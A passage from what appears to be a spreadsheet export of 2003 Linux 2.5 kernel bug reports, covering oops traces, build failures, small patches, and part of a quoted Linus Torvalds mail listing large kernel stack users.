0xc0118b41 &lt;render_sigset_t+69&gt;: test %edx,%edx 0xc0118b43 &lt;render_sigset_t+71&gt;: cmovne %eax,%ecx 0xc0118b46 &lt;render_sigset_t+74&gt;: lea 0x3(%esi),%edx 0xc0118b49 &lt;render_sigset_t+77&gt;: bt %edx,(%edi) 0xc0118b4c &lt;render_sigset_t+80&gt;: sbb %edx,%edx 0xc0118b4e &lt;render_sigset_t+82&gt;: mov %ecx,%eax 0xc0118b50 &lt;render_sigset_t+84&gt;: or $0x8,%al 0xc0118b52 &lt;render_sigset_t+86&gt;: test %edx,%edx 0xc0118b54 &lt;render_sigset_t+88&gt;: cmovne %eax,%ecx 0xc0118b57 &lt;render_sigset_t+91&gt;: mov %ebx,%edx 0xc0118b59 &lt;render_sigset_t+93&gt;: inc %ebx 0xc0118b5a &lt;render_sigset_t+94&gt;: lea 0x57(%ecx),%eax 0xc0118b5d &lt;render_sigset_t+97&gt;: cmp $0x9,%ecx 0xc0118b60 &lt;render_sigset_t+100&gt;: jg 0xc0118b65 &lt;render_sigset_t+105&gt; 0xc0118b62 &lt;render_sigset_t+102&gt;: lea 0x30(%ecx),%eax 0xc0118b65 &lt;render_sigset_t+105&gt;: mov %al,(%edx) 0xc0118b67 &lt;render_sigset_t+107&gt;: cmp $0x3,%esi 0xc0118b6a &lt;render_sigset_t+110&gt;: jg 0xc0118b10 &lt;render_sigset_t+20&gt; 0xc0118b6c &lt;render_sigset_t+112&gt;: movb $0x0,(%ebx) 0xc0118b6f &lt;render_sigset_t+115&gt;: mov %ebx,%eax 0xc0118b71 &lt;render_sigset_t+117&gt;: pop %ebx 0xc0118b72 &lt;render_sigset_t+118&gt;: pop %esi 0xc0118b73 &lt;render_sigset_t+119&gt;: pop %edi 0xc0118b74 &lt;render_sigset_t+120&gt;: mov %ebp,%esp 0xc0118b76 &lt;render_sigset_t+122&gt;: pop %ebp 0xc0118b77 &lt;render_sigset_t+123&gt;: ret End of assembler dump. larry:~/linux/2.5.61# addr2line -e vmlinux c0118b13 /root/linux/2.5.61/include/asm/signal.h:202 Is the asm statment in: static __inline__ int __gen_sigismember(sigset_t *set, int _sig) { int ret; __asm__("btl %2,%1\n\tsbbl %0,%0" : "=r"(ret) : "m"(*set), "Ir"(_sig-1) : "cc"); return ret; }</t>
  </si>
  <si>
    <t>Raid-0 causes kernel BUG at drivers/block/ll_rw_blk.c:1996</t>
  </si>
  <si>
    <t>2003-02-15 18:09 UTC</t>
  </si>
  <si>
    <t>Srihari Vijayaraghavan</t>
  </si>
  <si>
    <t>2003-05-30 20:28 UTC</t>
  </si>
  <si>
    <t>Distribution: RH 8.0 Hardware Environment: Athlon, AMD 761 (AMD North Bridge, VIA South bridge), IDE Hard drives Software Environment: Gnu C 3.2, Linux C Library 2.2.93, raidtools-1.00.2-3.3 Problem Description: 2.5.61 oops while trying to activate raid-0 volumes. Please refer the thread http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=103830814911111&amp;w=2 for more information from Neil Brown, Jens Axboe and Andrew Morton. Steps to reproduce: Try to enable raid-0 volumes under 2.5.49 to 2.5.61 Sample oops: ------------[ cut here ]------------ kernel BUG at drivers/block/ll_rw_blk.c:1996! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c02255d7&gt;] Not tainted EFLAGS: 00010246 EIP is at submit_bio+0x67/0x80 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: df515804 esi: df515804 edi: 00001e74 ebp: c14d72e0 esp: df325d28 ds: 007b es: 007b ss: 0068 Process rpmq (pid: 161, threadinfo=df324000 task=df5a5440) Stack: df9f9e04 df515804 c0188b1e 00000000 df515804 00001000 c0188de2 00000000 df515804 00001000 00000000 c0142d2f 00000001 dfd29d74 00000004 00004388 00000004 0000000a df17a0d4 00000010 df0e85fc df17a194 c14d72e0 00010901 Call Trace: [&lt;c0188b1e&gt;] mpage_bio_submit+0x2e/0x40 [&lt;c0188de2&gt;] do_mpage_readpage+0x182/0x320 [&lt;c0142d2f&gt;] cache_alloc_debugcheck_after+0xaf/0xd0 [&lt;c01c63df&gt;] radix_tree_node_alloc+0x1f/0x60 [&lt;c01c65d3&gt;] radix_tree_insert+0x93/0xd0 [&lt;c0189117&gt;] mpage_readpage+0x37/0x60 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c0139d89&gt;] do_generic_mapping_read+0x1c9/0x3f0 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a299&gt;] __generic_file_aio_read+0x1c9/0x200 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a32a&gt;] generic_file_aio_read+0x5a/0x80 [&lt;c015c9fc&gt;] do_sync_read+0x8c/0xc0 [&lt;c011801c&gt;] do_page_fault+0x23c/0x457 [&lt;c014e7a8&gt;] do_brk+0x148/0x220 [&lt;c015caec&gt;] vfs_read+0xbc/0x130 [&lt;c015ce68&gt;] sys_pread64+0x58/0x80 [&lt;c010a3af&gt;] syscall_call+0x7/0xb Code: 0f 0b cc 07 6e 7f 37 c0 eb aa 90 8d b4 26 00 00 00 00 8d bc ------------[ cut here ]------------ kernel BUG at drivers/block/ll_rw_blk.c:1996! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c02255d7&gt;] Not tainted EFLAGS: 00010246 EIP is at submit_bio+0x67/0x80 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: df517a04 esi: df517a04 edi: 0000003c ebp: c14c40f0 esp: debc1bd8 ds: 007b es: 007b ss: 0068 Process squid (pid: 395, threadinfo=debc0000 task=df5a40c0) Stack: dffbef0c df517a04 c0188b1e 00000000 df517a04 00001000 c0188de2 00000000 df517a04 00001000 00000000 c0141c26 00000001 dfd29d74 00000004 00000131 00000004 0000000a de96b554 00000010 00000020 00000001 c14c40f0 00034fc2 Call Trace: [&lt;c0188b1e&gt;] mpage_bio_submit+0x2e/0x40 [&lt;c0188de2&gt;] do_mpage_readpage+0x182/0x320 [&lt;c0141c26&gt;] kmem_cache_alloc+0x56/0x80 [&lt;c01c65ff&gt;] radix_tree_insert+0xbf/0xd0 [&lt;c01890ab&gt;] mpage_readpages+0x12b/0x160 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c013fd81&gt;] read_pages+0x111/0x120 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c0142c07&gt;] cache_free_debugcheck+0x157/0x1d0 [&lt;c013d563&gt;] __alloc_pages+0x93/0x2c0 [&lt;c01401c8&gt;] __do_page_cache_readahead+0xd8/0x150 [&lt;c013fdd3&gt;] do_page_cache_readahead+0x43/0x50 [&lt;c013fe54&gt;] page_cache_readahead+0x74/0x190 [&lt;c0139c6d&gt;] do_generic_mapping_read+0xad/0x3f0 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a299&gt;] __generic_file_aio_read+0x1c9/0x200 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a32a&gt;] generic_file_aio_read+0x5a/0x80 [&lt;c015c9fc&gt;] do_sync_read+0x8c/0xc0 [&lt;c014d03b&gt;] vma_merge+0x1cb/0x520 [&lt;c014d956&gt;] do_mmap_pgoff+0x5c6/0x6f0 [&lt;c015caec&gt;] vfs_read+0xbc/0x130 [&lt;c015cd8e&gt;] sys_read+0x3e/0x60 [&lt;c010a3af&gt;] syscall_call+0x7/0xb Code: 0f 0b cc 07 6e 7f 37 c0 eb aa 90 8d b4 26 00 00 00 00 8d bc ------------[ cut here ]------------ kernel BUG at drivers/block/ll_rw_blk.c:1996! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c02255d7&gt;] Not tainted EFLAGS: 00010246 EIP is at submit_bio+0x67/0x80 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: df517504 esi: df517504 edi: 00000058 ebp: c14ac090 esp: de295bd8 ds: 007b es: 007b ss: 0068 Process squid (pid: 501, threadinfo=de294000 task=de6ba800) Stack: dffafd44 df517504 c0188b1e 00000000 df517504 00001000 c0188de2 00000000 df517504 00001000 00000000 de295c08 00000001 dfd29d74 00000004 00000131 00000004 0000000a de96b554 00000010 def492e4 df4a0f34 c14ac090 00035042 Call Trace: [&lt;c0188b1e&gt;] mpage_bio_submit+0x2e/0x40 [&lt;c0188de2&gt;] do_mpage_readpage+0x182/0x320 [&lt;c01b09db&gt;] journal_dirty_metadata+0x25b/0x340 [&lt;c015e92f&gt;] wake_up_buffer+0xf/0x40 [&lt;c015e993&gt;] unlock_buffer+0x33/0x60 [&lt;c01890ab&gt;] mpage_readpages+0x12b/0x160 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c01a5c96&gt;] ext3_do_update_inode+0x196/0x420 [&lt;c013fd81&gt;] read_pages+0x111/0x120 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c0142c07&gt;] cache_free_debugcheck+0x157/0x1d0 [&lt;c013d563&gt;] __alloc_pages+0x93/0x2c0 [&lt;c01401c8&gt;] __do_page_cache_readahead+0xd8/0x150 [&lt;c013fdd3&gt;] do_page_cache_readahead+0x43/0x50 [&lt;c013ff29&gt;] page_cache_readahead+0x149/0x190 [&lt;c0139c6d&gt;] do_generic_mapping_read+0xad/0x3f0 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a299&gt;] __generic_file_aio_read+0x1c9/0x200 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a32a&gt;] generic_file_aio_read+0x5a/0x80 [&lt;c015c9fc&gt;] do_sync_read+0x8c/0xc0 [&lt;c011801c&gt;] do_page_fault+0x23c/0x457 [&lt;c014e7a8&gt;] do_brk+0x148/0x220 [&lt;c015caec&gt;] vfs_read+0xbc/0x130 [&lt;c015cd8e&gt;] sys_read+0x3e/0x60 [&lt;c010a3af&gt;] syscall_call+0x7/0xb Code: 0f 0b cc 07 6e 7f 37 c0 eb aa 90 8d b4 26 00 00 00 00 8d bc ------------[ cut here ]------------ kernel BUG at drivers/block/ll_rw_blk.c:1996! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c02255d7&gt;] Not tainted EFLAGS: 00010246 EIP is at submit_bio+0x67/0x80 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: df515e84 esi: df515e84 edi: 00000008 ebp: c1465280 esp: dc82dbd8 ds: 007b es: 007b ss: 0068 Process gnome-session (pid: 515, threadinfo=dc82c000 task=de6b8e00) Stack: dffbef7c df515e84 c0188b1e 00000000 df515e84 00001000 c0188de2 00000000 df515e84 00001000 00000000 c0141c26 00000001 dfd29ec4 00000004 00000009 00000004 0000000a dc23e554 00000010 00000020 00000001 c1465280 00002b81 Call Trace: [&lt;c0188b1e&gt;] mpage_bio_submit+0x2e/0x40 [&lt;c0188de2&gt;] do_mpage_readpage+0x182/0x320 [&lt;c0141c26&gt;] kmem_cache_alloc+0x56/0x80 [&lt;c01c65ff&gt;] radix_tree_insert+0xbf/0xd0 [&lt;c01890ab&gt;] mpage_readpages+0x12b/0x160 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c0244866&gt;] ide_wait_stat+0xf6/0x120 [&lt;c02404d9&gt;] start_request+0xf9/0x1b0 [&lt;c013fd81&gt;] read_pages+0x111/0x120 [&lt;c01a3430&gt;] ext3_get_block+0x0/0xa0 [&lt;c013d563&gt;] __alloc_pages+0x93/0x2c0 [&lt;c01401c8&gt;] __do_page_cache_readahead+0xd8/0x150 [&lt;c013fdd3&gt;] do_page_cache_readahead+0x43/0x50 [&lt;c013fe54&gt;] page_cache_readahead+0x74/0x190 [&lt;c0139c6d&gt;] do_generic_mapping_read+0xad/0x3f0 [&lt;c0161008&gt;] __bread+0x38/0x40 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a299&gt;] __generic_file_aio_read+0x1c9/0x200 [&lt;c0139ff0&gt;] file_read_actor+0x0/0xe0 [&lt;c013a32a&gt;] generic_file_aio_read+0x5a/0x80 [&lt;c015c9fc&gt;] do_sync_read+0x8c/0xc0 [&lt;c014cbea&gt;] __vma_link+0x3a/0xa0 [&lt;c014cd04&gt;] vma_link+0xb4/0x1a0 [&lt;c014d7ac&gt;] do_mmap_pgoff+0x41c/0x6f0 [&lt;c015caec&gt;] vfs_read+0xbc/0x130 [&lt;c015cd8e&gt;] sys_read+0x3e/0x60 [&lt;c010a3af&gt;] syscall_call+0x7/0xb Code: 0f 0b cc 07 6e 7f 37 c0 eb aa 90 8d b4 26 00 00 00 00 8d bc Thanks.</t>
  </si>
  <si>
    <t>ieee1394 fails to compile  linux/drivers/ieee1394/dma.c</t>
  </si>
  <si>
    <t>2003-02-15 23:40 UTC</t>
  </si>
  <si>
    <t>2003-03-06 13:11 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat/rawhide Hardware Environment: LX164 Software Environment: rawhide Problem Description: firewire codes fails to compile. Someone forget to include the correct header file. Steps to reproduce: attempt to compile Fix: *** linux/drivers/ieee1394/dma.c.orig 2003-02-15 23:34:00.000000000 -0800 --- linux/drivers/ieee1394/dma.c 2003-02-15 23:36:32.000000000 -0800 *************** *** 10,15 **** --- 10,16 ---- #include &lt;linux/module.h&gt; #include &lt;linux/vmalloc.h&gt; #include &lt;linux/slab.h&gt; + #include &lt;linux/mm.h&gt; #include "dma.h" /* dma_prog_region */</t>
  </si>
  <si>
    <t>modules fail to resolve illegal Unhandled relocation of type 10 for .text</t>
  </si>
  <si>
    <t>2003-02-15 23:44 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:16 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat/rawhide Hardware Environment:LX164 Software Environment: rawhide Problem Description: When an kernel build gets to the make modules section it runs an depmod. The depmod fails. see below for the error message. I'm not quite sure what to do to fix this. Steps to reproduce: issue an "make modules_install" depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text depmod: depmod obj_relocate failed depmod: Unhandled relocation of type 10 for .text depmod: Unhandled relocation of type 10 for .text</t>
  </si>
  <si>
    <t>opl3sa2.c fails to compile because on PNP error</t>
  </si>
  <si>
    <t>2003-02-16 11:52 UTC</t>
  </si>
  <si>
    <t>2003-05-04 07:48 UTC</t>
  </si>
  <si>
    <t>Distribution:redhat Hardware Environment:LX164 / alpha Software Environment:rawhide Problem Description: when building modules the file linux/sound/isa/opl3sa2.c reports compile errors. (PNP seems to be the cause.) I have patched it. my patch is included as an attachment. Steps to reproduce: select opl mixer compile</t>
  </si>
  <si>
    <t>Kernel will not boot against Asus P4T533-C</t>
  </si>
  <si>
    <t>2.5.61 (pristine)</t>
  </si>
  <si>
    <t>2003-02-16 13:47 UTC</t>
  </si>
  <si>
    <t>Bryan W. Headley</t>
  </si>
  <si>
    <t>2003-05-29 06:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Asus P4T533-C; 3Ghz PIV; 1GB RAM Software Environment: Kernel 2.5.61 built without mkinitrd; boot with Lilo Problem Description: Nothing displayed after "Booting Linux..." (last message from Lilo) Lilo 22.4; module-init-tools 0.9.9 Steps to reproduce: Build-n-boot.</t>
  </si>
  <si>
    <t>Stephen Hemminger</t>
  </si>
  <si>
    <t>Make rpm doesn't work</t>
  </si>
  <si>
    <t>2003-02-18 07:20 UTC</t>
  </si>
  <si>
    <t>2003-03-05 06:13 UTC</t>
  </si>
  <si>
    <t>Distribution:Mandrake 9.0 Hardware Environment: Software Environment: Problem Description:Make rpm doesn't work Steps to reproduce: [root@frodo linux-2.5.61]# make rpm make: *** No rule to make target `clean', needed by `rpm'. Stop</t>
  </si>
  <si>
    <t>problems with /proc/ide/via</t>
  </si>
  <si>
    <t>2.5.62</t>
  </si>
  <si>
    <t>2003-02-18 07:28 UTC</t>
  </si>
  <si>
    <t>Janek Hiis</t>
  </si>
  <si>
    <t>2004-07-17 18:05 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat 7.3 Hardware Environment: ASUS A7V266-C with athlon 1700+ XP, 512 MB ram Software Environment: gcc 2.96 20000731 Problem Description: the /prod/ide/via is not complete. it ends like : Cable Type: 80w 40w -------------------drive0----drive1----drive2----drive3----- Transfer Mode: UD wheres on 2.4.20 it works fine.</t>
  </si>
  <si>
    <t>M5451 (OSS trident.c) did not come out of reset</t>
  </si>
  <si>
    <t>2003-02-18 08:31 UTC</t>
  </si>
  <si>
    <t>2003-03-04 00:07 UTC</t>
  </si>
  <si>
    <t>Last time I booted 2.5, I noticed that my sound card no longer works. The card is: 00:06.0 Multimedia audio controller: Acer Laboratories Inc. [ALi] M5451 PCI AC-Link Controller Audio Device (rev 01) And the computer is a thinkpad R30. It turns out that this patch, from Alan Cox on 01/11/2002, broke it for me, by failing ali_reset_5451 if the card doesn't come out of reset: # -------------------------------------------- # 02/11/01 alan@lxorguk.ukuu.org.uk 1.786.161.45 # [PATCH] some trident needs longer delays to power up codecs # -------------------------------------------- The 2.4 behaviour is to continue as usual even if the card doesn't come out of reset, because it's a non fatal error on at least some cards. This patch reverts the behaviour to the 2.4 behaviour, which works for me. If anyone knows how to tell for a given card whether this is a fatal error or not, please let me know and I'll update the patch.</t>
  </si>
  <si>
    <t>tiny extra echo in Makefile</t>
  </si>
  <si>
    <t>2.5.62-bk1</t>
  </si>
  <si>
    <t>2003-02-18 11:50 UTC</t>
  </si>
  <si>
    <t>2003-03-03 08:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Software Environment: Problem Description: During the kernel build, the Makefile (I think) spits out one extra line that isn't intended. make -f scripts/Makefile.build obj=arch/i386/lib echo ' Generating build number' Generating build number . ./scripts/mkversion &gt; .tmp_version For some reason, it prints "echo ' Generating build number'", then prints 'Generating build number'. I don't think this is intentional. Steps to reproduce:</t>
  </si>
  <si>
    <t>2.5.62 : emu10k1 unknown symbol</t>
  </si>
  <si>
    <t>2003-02-18 20:50 UTC</t>
  </si>
  <si>
    <t>Software Environment: module-init-tools version 0.9.9 Problem Description: modprobe emu10k1 produces unknown symbol error emu10k1: Unknown symbol unregister_sound_midi emu10k1: Unknown symbol midi_synth_reset emu10k1: Unknown symbol midi_synth_controller emu10k1: Unknown symbol unregister_sound_mixer emu10k1: Unknown symbol midi_synth_set_instr emu10k1: Unknown symbol midi_devs emu10k1: Unknown symbol sound_alloc_mididev emu10k1: Unknown symbol register_sound_dsp emu10k1: Unknown symbol ac97_read_proc emu10k1: Unknown symbol midi_synth_ioctl emu10k1: Unknown symbol midi_synth_open emu10k1: Unknown symbol midi_synth_send_sysex emu10k1: Unknown symbol sequencer_init emu10k1: Unknown symbol midi_synth_close emu10k1: Unknown symbol unregister_sound_dsp emu10k1: Unknown symbol midi_synth_bender emu10k1: Unknown symbol register_sound_mixer emu10k1: Unknown symbol midi_synth_start_note emu10k1: Unknown symbol sound_unload_mididev emu10k1: Unknown symbol midi_synth_load_patch emu10k1: Unknown symbol midi_synth_panning emu10k1: Unknown symbol midi_synth_aftertouch emu10k1: Unknown symbol midi_synth_setup_voice emu10k1: Unknown symbol midi_synth_kill_note emu10k1: Unknown symbol midi_synth_hw_control emu10k1: Unknown symbol ac97_probe_codec emu10k1: Unknown symbol register_sound_midi</t>
  </si>
  <si>
    <t>SB16 compile errors</t>
  </si>
  <si>
    <t>2003-02-19 08:10 UTC</t>
  </si>
  <si>
    <t>2003-06-11 09:30 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: Sound Blaster 16 ISA Software Environment: GCC 3.2.1; Glibc 2.3 Problem Description: SB16 doesn't compile w/o errors: gcc -Wp,-MD,sound/isa/sb/.sb16_main.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=sb16_main -DKBUILD_MODNAME=snd_sb16_dsp -c -o sound/isa/sb/sb16_main.o sound/isa/sb/sb16_main.c gcc -Wp,-MD,sound/isa/sb/.sb16.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium3 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=sb16 -DKBUILD_MODNAME=snd_sb16 -c -o sound/isa/sb/sb16.o sound/isa/sb/sb16.c sound/isa/sb/sb16.c: In function `snd_sb16_isapnp': sound/isa/sb/sb16.c:279: warning: implicit declaration of function `isapnp_find_dev' sound/isa/sb/sb16.c:279: warning: assignment makes pointer from integer without a cast sound/isa/sb/sb16.c:280: structure has no member named `active' sound/isa/sb/sb16.c:293: structure has no member named `prepare' sound/isa/sb/sb16.c:296: warning: implicit declaration of function `isapnp_resource_change' sound/isa/sb/sb16.c:307: structure has no member named `activate' sound/isa/sb/sb16.c: In function `snd_sb16_deactivate': sound/isa/sb/sb16.c:347: structure has no member named `deactivate' sound/isa/sb/sb16.c: In function `alsa_card_sb16_init': sound/isa/sb/sb16.c:632: warning: implicit declaration of function `isapnp_probe_cards' make[3]: *** [sound/isa/sb/sb16.o] Error 1 make[2]: *** [sound/isa/sb] Error 2 make[1]: *** [sound/isa] Error 2 make: *** [sound] Error 2 Steps to reproduce: Use attached config file and make modules (after bzImage?)</t>
  </si>
  <si>
    <t>Unknown column 'product' in 'where clause' at globals.pl line 276.</t>
  </si>
  <si>
    <t>none</t>
  </si>
  <si>
    <t>2003-02-19 18:55 UTC</t>
  </si>
  <si>
    <t>2003-02-27 14:50 UTC</t>
  </si>
  <si>
    <t>bug reports, output="most recently doomed" Most Recently Doomed Wed Feb 19 18:54:03 2003 Content-type: text/html Software error: select distinct assigned_to from bugs where bugs.bug_status='NEW' and target_milestone='' and bug_severity!='enhancement' and status_whiteboard='' and (product='Browser' or product='MailNews'): Unknown column 'product' in 'where clause' at globals.pl line 276. For help, please send mail to the webmaster (webmaster@osdl.net), giving this error message and the time and date of the error.</t>
  </si>
  <si>
    <t>aha152x.c fails to compile, since 2.5.60 (now .62)</t>
  </si>
  <si>
    <t>2.5.60-2.5.62</t>
  </si>
  <si>
    <t>2003-02-20 12:50 UTC</t>
  </si>
  <si>
    <t>James Loope</t>
  </si>
  <si>
    <t>2005-07-05 12:04 UTC</t>
  </si>
  <si>
    <t>list of the worst stack offenders in the kernel (from Linus on lkml)</t>
  </si>
  <si>
    <t>2.5.62-bk</t>
  </si>
  <si>
    <t>2003-02-20 23:46 UTC</t>
  </si>
  <si>
    <t>2004-12-07 12:51 UTC</t>
  </si>
  <si>
    <t>Quoting Linus verbatim: Date: Thu, 20 Feb 2003 08:54:55 -0800 (PST) From: Linus Torvalds &lt;torvalds@transmeta.com&gt; To: "Martin J. Bligh" &lt;mbligh@aracnet.com&gt; Cc: Ingo Molnar &lt;mingo@elte.hu&gt;, Dave Hansen &lt;haveblue@us.ibm.com&gt;, Zwane Mwaikambo &lt;zwane@holomorphy.com&gt;, Chris Wedgwood &lt;cw@f00f.org&gt;, Kernel Mailing List &lt;linux-kernel@vger.kernel.org&gt;, William Lee Irwin III &lt;wli@holomorphy.com&gt; Subject: Re: doublefault debugging (was Re: Linux v2.5.62 --- spontaneous reboots) On Thu, 20 Feb 2003, Martin J. Bligh wrote: &gt; &gt; There are patches in -mjb from Dave Hansen / Ben LaHaise to detect stack &gt; overflow included with the stuff for the 4K stacks patch (intended for &gt; scaling to large numbers of tasks). I've split them out attatched, should &gt; apply to mainline reasonably easily. Ok, the 4kB stack definitely won't work in real life, but that's because we have some hopelessly bad stack users in the kernel. But the debugging part would be good to try (in fact, it might be a good idea to keep the 8kB stack, but with rather anal debugging. Just the "mcount" part should do that). A sorted list of bad stack users (more than 256 bytes) in my default build follows. Anybody can create their own with something like objdump -d linux/vmlinux | grep 'sub.*$0x...,.*esp' | awk '{ print $9,$1 }' | sort &gt; bigstack and a script to look up the addresses. That ide_unregister() thing uses up &gt;2kB in just one call! And there are several in the 1.5kB range too, with a long list of ~500 byte offenders. Yeah, and this assumes we don't have alloca() users or other dynamic stack allocators (non-constant-size automatic arrays). I hope we don't have that kind of crap anywhere.. Linus ----- 0xc02ae062 &lt;ide_unregister+8&gt;: sub $0x8c4,%esp 0xc010535d &lt;huft_build+9&gt;: sub $0x5b0,%esp 0xc0326a53 &lt;snd_pcm_oss_change_params+6&gt;: sub $0x590,%esp 0xc0106156 &lt;inflate_dynamic+6&gt;: sub $0x554,%esp 0xc0176150 &lt;elf_core_dump+13&gt;: sub $0x4b4,%esp 0xc0105fb8 &lt;inflate_fixed+7&gt;: sub $0x4ac,%esp 0xc035935e &lt;pci_sanity_check+6&gt;: sub $0x398,%esp 0xc035986d &lt;pcibios_fixup_peer_bridges+5&gt;: sub $0x394,%esp 0xc0334b85 &lt;snd_pcm_hw_params_old_user+8&gt;: sub $0x37c,%esp 0xc0334a97 &lt;snd_pcm_hw_refine_old_user+8&gt;: sub $0x37c,%esp 0xc02fbc74 &lt;cb_alloc+6&gt;: sub $0x32c,%esp 0xc0211b2a &lt;pci_do_scan_bus+14&gt;: sub $0x314,%esp 0xc034be58 &lt;snd_seq_midisynth_register_port+12&gt;: sub $0x2f0,%esp 0xc0264406 &lt;extract_entropy+6&gt;: sub $0x2d8,%esp 0xc02fcdde &lt;ds_ioctl+3&gt;: sub $0x2c8,%esp 0xc01dbd6b &lt;udf_load_pvoldesc+6&gt;: sub $0x2bc,%esp 0xc0329c6e &lt;snd_pcm_oss_proc_write+6&gt;: sub $0x298,%esp 0xc02a218f &lt;pcnet_config+6&gt;: sub $0x294,%esp 0xc01c8457 &lt;nlmclnt_proc+14&gt;: sub $0x294,%esp 0xc0327ecc &lt;snd_pcm_oss_get_formats+12&gt;: sub $0x290,%esp 0xc01d781f &lt;udf_add_entry+6&gt;: sub $0x290,%esp 0xc01c8e56 &lt;nlmclnt_reclaim+18&gt;: sub $0x280,%esp 0xc0330802 &lt;snd_pcm_hw_params_user+8&gt;: sub $0x27c,%esp 0xc03304af &lt;snd_pcm_hw_refine_user+8&gt;: sub $0x27c,%esp 0xc01ea4c9 &lt;reiserfs_rename+13&gt;: sub $0x27c,%esp 0xc029b57c &lt;e100_ethtool_eeprom+10&gt;: sub $0x260,%esp 0xc020a9df &lt;semctl_main+12&gt;: sub $0x25c,%esp 0xc0267205 &lt;do_kdgkb_ioctl+24&gt;: sub $0x244,%esp 0xc01d0ac8 &lt;do_udf_readdir+6&gt;: sub $0x240,%esp 0xc01e137a &lt;udf_get_filename+3&gt;: sub $0x23c,%esp 0xc01bd38c &lt;find_exported_dentry+8&gt;: sub $0x234,%esp 0xc01a5fa4 &lt;fat_readdirx+15&gt;: sub $0x230,%esp 0xc01fe813 &lt;reiserfs_delete_solid_item+6&gt;: sub $0x22c,%esp 0xc031f24d &lt;snd_iprintf+3&gt;: sub $0x21c,%esp 0xc02b4d6f &lt;cdrom_read_intr+8&gt;: sub $0x21c,%esp 0xc024adfb &lt;pnp_printf+3&gt;: sub $0x218,%esp 0xc02b4cac &lt;cdrom_buffer_sectors+11&gt;: sub $0x210,%esp 0xc01ebf96 &lt;reiserfs_get_block+8&gt;: sub $0x210,%esp 0xc020b2f0 &lt;sys_semtimedop+3&gt;: sub $0x208,%esp 0xc01fe58d &lt;reiserfs_delete_item+12&gt;: sub $0x208,%esp 0xc0529e98 &lt;snd_seq_oss_create_client+12&gt;: sub $0x204,%esp 0xc038efed &lt;tcp_check_req+6&gt;: sub $0x1f8,%esp 0xc038b462 &lt;tcp_v4_conn_request+6&gt;: sub $0x1f8,%esp 0xc01fef81 &lt;reiserfs_cut_from_item+6&gt;: sub $0x1f8,%esp 0xc038df7f &lt;tcp_timewait_state_process+8&gt;: sub $0x1e4,%esp 0xc0325539 &lt;snd_mixer_oss_build_input+3&gt;: sub $0x1e0,%esp 0xc01d9328 &lt;udf_symlink+13&gt;: sub $0x1cc,%esp 0xc01ffb15 &lt;reiserfs_insert_item+6&gt;: sub $0x1c4,%esp 0xc01ffa03 &lt;reiserfs_paste_into_item+6&gt;: sub $0x1c4,%esp 0xc01c43b6 &lt;svc_export_parse+3&gt;: sub $0x1c4,%esp 0xc02f6770 &lt;pcmcia_validate_cis+3&gt;: sub $0x1c0,%esp 0xc052a2c7 &lt;snd_seq_system_client_init+24&gt;: sub $0x1bc,%esp 0xc03511c9 &lt;snd_intel8x0_mixer+13&gt;: sub $0x1bc,%esp 0xc01a54f8 &lt;fat_search_long+6&gt;: sub $0x1b4,%esp 0xc052a0a1 &lt;snd_seq_oss_midi_lookup_ports+9&gt;: sub $0x1ac,%esp 0xc02e99f5 &lt;sg_ioctl+6&gt;: sub $0x19c,%esp 0xc0320fb0 &lt;snd_ctl_card_info+12&gt;: sub $0x198,%esp 0xc0171860 &lt;ep_send_events+8&gt;: sub $0x198,%esp 0xc0155ad4 &lt;blkdev_get+11&gt;: sub $0x194,%esp 0xc01b3bea &lt;nfs_symlink+6&gt;: sub $0x18c,%esp 0xc01b2699 &lt;nfs_readdir+9&gt;: sub $0x18c,%esp 0xc01b347d 